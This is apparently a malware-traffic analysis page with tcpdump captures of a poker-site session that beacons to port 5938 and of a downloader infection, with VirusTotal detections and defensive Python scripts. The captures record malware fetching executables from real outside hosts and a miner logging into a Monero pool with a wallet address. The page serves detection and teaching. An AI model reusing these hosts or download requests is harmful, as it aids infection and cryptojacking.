BETONLINE.AG poker (poker.betonline.ag) PCAP file download: traffic analysis sample

Betonline.ag poker site PCAP traffic sample (tcpdump summary lines, client 192.168.1.102, captured 2017-09-25)

2017-09-25 15:49:10.187283 IP 192.168.1.102.57820 > 75.75.75.75.53: 27634+ A? poker.betonline.ag. (36)
2017-09-25 15:49:12.457700 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 1454268158:1454268182, ack 2127766518, win 32458, length 24
2017-09-25 15:49:12.589103 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 25, win 32452, length 0
2017-09-25 15:49:47.366759 IP 192.168.1.102.49487 > 75.75.75.75.53: 8606+ A? www.google-analytics.com. (42)
2017-09-25 15:49:49.584408 IP 192.168.1.102.52369 > 75.75.75.75.53: 10203+ A? poker.tigergaming.com. (39)
2017-09-25 15:49:49.615175 IP 192.168.1.102.52369 > 75.75.76.76.53: 10203+ A? poker.tigergaming.com. (39)
2017-09-25 15:50:07.611927 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 24:48, ack 25, win 32452, length 24
2017-09-25 15:50:07.728399 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 49, win 32446, length 0
2017-09-25 15:50:08.575969 IP 192.168.1.102.55489 > 75.75.75.75.53: 11174+ A? client-cf.dropbox.com. (39)
2017-09-25 15:51:02.698632 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 48:72, ack 49, win 32446, length 24
2017-09-25 15:51:02.814051 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 73, win 32440, length 0
2017-09-25 15:51:17.250346 IP 192.168.1.102.50604 > 75.75.75.75.53: 7567+ A? ipcast1.dynupdate.noip.com. (44)
2017-09-25 15:51:57.784824 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 72:96, ack 73, win 32440, length 24
2017-09-25 15:51:57.899186 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 97, win 32434, length 0
2017-09-25 15:52:52.873056 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 96:120, ack 97, win 32434, length 24
2017-09-25 15:52:52.988402 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 121, win 32428, length 0
2017-09-25 15:53:47.959655 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 120:144, ack 121, win 32428, length 24
2017-09-25 15:53:48.074117 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 145, win 32422, length 0
2017-09-25 15:54:43.048410 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 144:168, ack 145, win 32422, length 24
2017-09-25 15:54:43.164776 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 169, win 32416, length 0
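The detail worth pulling out of the listing above is not the DNS (75.75.75.75 and 75.75.76.76 are Comcast's public resolvers, and ipcast1.dynupdate.noip.com is No-IP's dynamic DNS update service) but the session from 192.168.1.102:49694 to 50.22.136.104 on TCP/5938: a 24-byte push every 55 seconds, each acknowledged with 24 bytes back, for the whole six minutes of the capture. Constant size plus a fixed interval is what an application keepalive or a beacon looks like, not a person playing poker. 5938/tcp is the port registered for TeamViewer, but the capture itself does not identify the application. The following is an added example, not code from the original page: it parses tcpdump summary lines copied from this capture and reports flows whose data-carrying segments recur at a steady interval. The min_pushes and max_jitter thresholds are this example's own assumptions.

```python
"""Periodicity ("beaconing") check over tcpdump summary lines.

Added example for the capture above; it is not code from the original page.
SAMPLE_LINES are copied from that capture's summary lines. The parser handles
tcpdump's one-line summary format only, and the thresholds in find_beacons()
are this example's own choices rather than a published standard.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# "<date> <time> IP <src>.<sport> > <dst>.<dport>: Flags [..], ..., length N"
# DNS and other non-TCP lines have no "Flags [...]" part and are skipped.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): "
    r"(?:Flags \[(?P<flags>[^\]]*)\].*?length (?P<len>\d+))?"
)

# Summary lines copied from the capture above (a subset; enough to show the pattern).
SAMPLE_LINES = """\
2017-09-25 15:49:10.187283 IP 192.168.1.102.57820 > 75.75.75.75.53: 27634+ A? poker.betonline.ag. (36)
2017-09-25 15:49:12.457700 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 1454268158:1454268182, ack 2127766518, win 32458, length 24
2017-09-25 15:49:12.589103 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 25, win 32452, length 0
2017-09-25 15:49:47.366759 IP 192.168.1.102.49487 > 75.75.75.75.53: 8606+ A? www.google-analytics.com. (42)
2017-09-25 15:50:07.611927 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 24:48, ack 25, win 32452, length 24
2017-09-25 15:51:02.698632 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 48:72, ack 49, win 32446, length 24
2017-09-25 15:51:57.784824 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 72:96, ack 73, win 32440, length 24
2017-09-25 15:52:52.873056 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 96:120, ack 97, win 32434, length 24
2017-09-25 15:53:47.959655 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 120:144, ack 121, win 32428, length 24
2017-09-25 15:54:43.048410 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 144:168, ack 145, win 32422, length 24
""".splitlines()


def parse(lines):
    """Yield one dict per TCP summary line (timestamp, endpoints, flags, length)."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m.group("len") is None:
            continue
        yield {
            "ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f"),
            "src": m.group("src"),
            "dst": m.group("dst"),
            "dport": int(m.group("dport")),
            "flags": m.group("flags"),
            "length": int(m.group("len")),
        }


def find_beacons(lines, min_pushes=4, max_jitter=0.10):
    """Return flows whose data-carrying segments recur at a steady interval.

    Flows are keyed by (src, dst, dport). For every flow with at least
    min_pushes segments that carry payload, the gaps between consecutive
    segments are measured; a flow is reported when the population standard
    deviation of those gaps is at most max_jitter times their mean. The set
    of payload sizes is returned too: a single constant size is what a
    scripted keepalive looks like, while interactive traffic varies.
    """
    flows = defaultdict(list)
    for pkt in parse(lines):
        if pkt["length"] > 0:
            flows[(pkt["src"], pkt["dst"], pkt["dport"])].append(pkt)

    results = {}
    for key, pkts in flows.items():
        if len(pkts) < min_pushes:
            continue
        pkts.sort(key=lambda p: p["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(pkts, pkts[1:])]
        mean = statistics.mean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if jitter <= max_jitter:
            results[key] = {
                "count": len(pkts),
                "mean_gap_s": round(mean, 2),
                "jitter": round(jitter, 3),
                "sizes": sorted({p["length"] for p in pkts}),
            }
    return results


if __name__ == "__main__":
    for (src, dst, dport), info in find_beacons(SAMPLE_LINES).items():
        print(f"{src} -> {dst}:{dport}: {info['count']} pushes, "
              f"every {info['mean_gap_s']} s, payload sizes {info['sizes']}")
```

Run against the sample, the only flow reported is 192.168.1.102 -> 50.22.136.104:5938, seven pushes about 55.1 s apart with a single payload size of 24 bytes. On a real capture, feed it `tcpdump -nn -r file.pcap` output (no -A or -X, which add lines the parser ignores anyway) and raise min_pushes so that short-lived flows do not produce noise.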

Possible Poweliks variant trojan downloader, adware pay-per-download, Monero (XMR) cryptocurrency miner: PCAP file download traffic sample


VirusTotal results (engine, detection name, signature database date):

ESET-NOD32                             NSIS/TrojanDownloader.Agent.NVZ               20170703
Fortinet                               W32/Agent.NVS!tr.dldr                         20170629
Invincea                               heuristic                                     20170607
Kaspersky                              Trojan.Win32.Poweliks.adbd                    20170703
McAfee                                 Artemis!DD96CB7EFE6D                          20170703
McAfee-GW-Edition                      BehavesLike.Win32.Vopak.kc                    20170703
Microsoft                              Trojan:Win32/Starter.P                        20170703
Palo Alto Networks (Known Signatures)  generic.ml                                    20170703
Qihoo-360                              Win32/Trojan.1e3                              20170703
Rising                                 Adware.ConvertAd!1.A1B5 (cloud:zJ49DXPzuCC)   20170703
SentinelOne (Static ML)                static engine - malicious                     20170516
Sophos                                 Mal/Generic-S                                 20170703
Tencent                                Nsis.Trojan-downloader.Agent.Wuqw             20170703
TrendMicro-HouseCall                   Suspicious_GEN.F47V0703                       20170703
VBA32                                  suspected of Trojan.Downloader.gen.h          20170630
VIPRE                                  Trojan.Win32.Generic!BT                       20170703
ZoneAlarm by Check Point               Trojan.Win32.Poweliks.adbd                    20170703

 

SHA256: f1877f0fd9bcaa4ee4498eb8f7c55cf2086313f2209caa18ef597898d2376e72
File name: lnk.php
Detection ratio: 25 / 61
Analysis date: 2017-07-03 21:51:38 UTC

 

https://virustotal.com/en/file/f1877f0fd9bcaa4ee4498eb8f7c55cf2086313f2209caa18ef597898d2376e72/analysis/1499118698/

 

2017-07-03 15:34:00.193162 IP 192.168.1.102.60285 > 198.50.183.24.80: Flags [P.], seq 0:390, ack 1, win 256, length 390: HTTP: GET /lnk.php HTTP/1.1
GET /lnk.php HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: syska.gdn
Connection: Keep-Alive

2017-07-03 15:34:36.065319 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 0:131, ack 1, win 256, length 131
GET /30.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

2017-07-03 15:34:36.366793 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 0:131, ack 1, win 256, length 131
GET /30.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

 

2017-07-03 15:34:44.119376 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 131:262, ack 486923, win 256, length 131
GET /20.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

2017-07-03 15:34:56.011332 IP 192.168.1.102.60289 > 198.50.183.24.80: Flags [P.], seq 0:130, ack 1, win 256, length 130: HTTP: GET /nm/geoip.php HTTP/1.1
GET /nm/geoip.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cydro.gdn
Connection: Keep-Alive
Cache-Control: no-cache

2017-07-03 15:34:56.067684 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 262:392, ack 1511166, win 255, length 130
GET /7.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

 

2017-07-03 15:35:07.289892 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 392:523, ack 2443112, win 256, length 131
GET /45.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

 

2017-07-03 15:35:13.808692 IP 192.168.1.102.60839 > 75.75.75.75.53: 1813+ A? xmr.crypto-pool.fr. (36)
2017-07-03 15:35:14.095181 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [S], seq 3285038852, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-07-03 15:35:14.199441 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [.], ack 203640344, win 256, length 0
2017-07-03 15:35:14.201398 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [P.], seq 0:197, ack 1, win 256, length 197
{"method": "login", "params": {"login": "49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY", "pass": "x", "agent": "cpuminer-multi/1.2-dev"}, "id": 1}

2017-07-03 15:35:14.438781 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [.], ack 304, win 255, length 0
2017-07-03 15:35:15.212929 IP 192.168.1.102.60840 > 75.75.75.75.53: 41488+ A? nottotrack.com. (32)
2017-07-03 15:35:15.319740 IP 192.168.1.102.60291 > 200.7.96.34.80: Flags [S], seq 1077723448, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-07-03 15:35:15.420292 IP 192.168.1.102.60291 > 200.7.96.34.80: Flags [.], ack 550699079, win 256, length 0
2017-07-03 15:35:15.427728 IP 192.168.1.102.60291 > 200.7.96.34.80: Flags [P.], seq 0:106, ack 1, win 256, length 106: HTTP: GET /proxy/get_build.php HTTP/1.0
GET /proxy/get_build.php HTTP/1.0
Host: nottotrack.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2017-07-03 15:37:05.377167 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4464826, win 5446, length 0
2017-07-03 15:37:05.378957 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4469206, win 5446, length 0
2017-07-03 15:37:05.380518 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4473586, win 5446, length 0
2017-07-03 15:37:05.381921 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4477966, win 5446, length 0
2017-07-03 15:37:05.382248 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4479426, win 5446, length 0
2017-07-03 15:37:05.385510 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4491106, win 5417, length 0
2017-07-03 15:37:05.388535 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4501326, win 5417, length 0
2017-07-03 15:37:05.397221 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4515926, win 5383, length 0
2017-07-03 15:37:05.397349 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4530526, win 5383, length 0
2017-07-03 15:37:05.397356 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4531986, win 5383, length 0
2017-07-03 15:37:05.401019 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4543666, win 5366, length 0
2017-07-03 15:37:05.407107 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4558266, win 5366, length 0
2017-07-03 15:37:05.407261 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4565566, win 5366, length 0
2017-07-03 15:37:05.412163 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4578706, win 5355, length 0
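The chain in this capture is: an Internet Explorer 8 user agent fetches /lnk.php from syska.gdn; an NSIS installer then pulls 30.exe, 20.exe, 7.exe and 45.exe from an IP-literal host on 151.80.8.97:5450 with the "NSIS_Inetc (Mozilla)" user agent of the NSIS Inetc plugin, does a geoip.php check at cydro.gdn, and a second download stage with the NSISdl plugin's "NSISDL/1.2 (Mozilla)" agent hits nottotrack.com; finally the host resolves xmr.crypto-pool.fr and sends a Stratum JSON-RPC "login" to 212.83.168.41:6666 carrying a 95-character Monero address and the agent string cpuminer-multi/1.2-dev. The miner is therefore a Monero (XMR) miner, and the login message is the cheapest network indicator in the whole sample since it is sent in clear text before any mining work. The following is an added example, not code from the original page or from the sample: it re-types those requests and the login message and runs three simple rules over them. The rule names, the abridged headers in the sample requests, and the choice of "80"/"443" as the only ordinary Host ports are this example's own assumptions.

```python
"""Indicator extraction for the second capture: NSIS-plugin downloads and the
Stratum "login" to a Monero pool.

Added example for the capture above; it is not code from the original page.
SAMPLE_REQUESTS and STRATUM_LOGIN are re-typed from the packets shown on the
page (headers abridged); rule names and thresholds are this example's own.
"""
import ipaddress
import json
import re

# User-agent prefixes of the NSIS Inetc and NSISdl download plugins, as seen in the capture.
NSIS_UA = ("NSIS_Inetc", "NSISDL")
# Base58 alphabet used by Monero addresses (no 0, O, I or l).
BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")

SAMPLE_REQUESTS = [  # constructed from the requests in the capture above, headers abridged
    "GET /lnk.php HTTP/1.1\r\n"
    "Accept: image/jpeg, application/x-ms-application, image/gif, */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\r\n"
    "Host: syska.gdn\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /30.exe HTTP/1.1\r\nUser-Agent: NSIS_Inetc (Mozilla)\r\n"
    "Host: 151.80.8.97:5450\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
    "GET /nm/geoip.php HTTP/1.1\r\nUser-Agent: NSIS_Inetc (Mozilla)\r\n"
    "Host: cydro.gdn\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
    "GET /proxy/get_build.php HTTP/1.0\r\nHost: nottotrack.com\r\n"
    "User-Agent: NSISDL/1.2 (Mozilla)\r\nAccept: */*\r\n\r\n",
]

# The 197-byte push to 212.83.168.41:6666, as printed by tcpdump -A in the capture above.
STRATUM_LOGIN = (
    '{"method": "login", "params": {"login": "49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXc'
    'SZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY", "pass": "x", '
    '"agent": "cpuminer-multi/1.2-dev"}, "id": 1}'
)


def parse_request(raw):
    """Split an HTTP request (request line plus headers) into a dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def host_is_ip_literal(host):
    """True for Host values like 151.80.8.97:5450, where no DNS name is involved."""
    name = host.rsplit(":", 1)[0] if re.search(r":\d+$", host) else host
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def classify_request(raw):
    """Return the names of the rules that fire on one request (empty list if none)."""
    req = parse_request(raw)
    ua = req["headers"].get("user-agent", "")
    host = req["headers"].get("host", "")
    hits = []
    if ua.startswith(NSIS_UA):
        hits.append("nsis-downloader-ua")        # installer plugin fetching over HTTP
    if req["path"].lower().endswith(".exe") and host_is_ip_literal(host):
        hits.append("exe-from-ip-literal")       # executable pulled from a bare IP
    m = re.search(r":(\d+)$", host)
    if m and m.group(1) not in ("80", "443"):
        hits.append("non-standard-port")         # e.g. the 5450/tcp server here
    return hits


def is_monero_address(addr):
    """Standard Monero address: 95 base58 characters, first char '4' ('8' for a subaddress)."""
    return len(addr) == 95 and addr[0] in "48" and set(addr) <= BASE58


def parse_stratum_login(payload):
    """Extract wallet and miner agent from a Stratum JSON-RPC login; None if not one."""
    try:
        msg = json.loads(payload)
    except ValueError:
        return None
    if msg.get("method") != "login":
        return None
    params = msg.get("params", {})
    wallet = params.get("login", "")
    return {"wallet": wallet, "agent": params.get("agent", ""),
            "monero_address": is_monero_address(wallet)}


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(raw.split("\r\n", 1)[0], "->", classify_request(raw) or "clean")
    print(parse_stratum_login(STRATUM_LOGIN))
```

The three HTTP rules fire on the downloader stage, minutes before the miner connects, which is where a proxy or IDS has the most leverage; the Stratum parser gives you the pool wallet, which is the indicator worth pivoting on across other samples, since the wallet ties campaigns together even when the pool host and binary hashes change.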